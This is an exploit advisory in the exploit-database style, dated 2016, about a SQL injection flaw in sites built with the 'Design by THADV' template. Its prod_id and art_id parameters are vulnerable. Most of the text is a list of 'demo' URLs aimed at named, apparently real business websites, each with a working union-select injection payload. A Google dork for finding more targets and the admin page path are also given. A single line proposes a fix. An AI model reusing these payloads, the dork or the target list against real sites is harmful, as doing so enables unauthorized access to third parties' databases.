######################
# Exploit Title : Design by THADV SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://thadv.com/
# Google Dork : intext:"Design by THADV" index.php?func=
# Date: 24 01 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# Admin page : <target>/admin/
#
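# Affected parameters : prod_id (func=product) and art_id (func=article) of index.php, action=view
# Fix : the ids appear to reach the SQL query unescaped; cast them to int or bind them in a prepared statement
# Demos :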
# http://www.hwananfoods.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.chwm3d.com/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://oiltea.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://lianhong.tw/mobile/index.php?func=article&action=view&art_id=-46+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9--%20-
# http://meishu.com.tw/wap/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.baotian.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.jhc888.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://chyu2.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.summerland.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.similar.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://hicar.imobi.tw/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.thadv.com/advmobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
# http://www.117.com.tw/mobile/index.php?func=product&action=view&prod_id=-3+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
######################
# discovered by : modiret
######################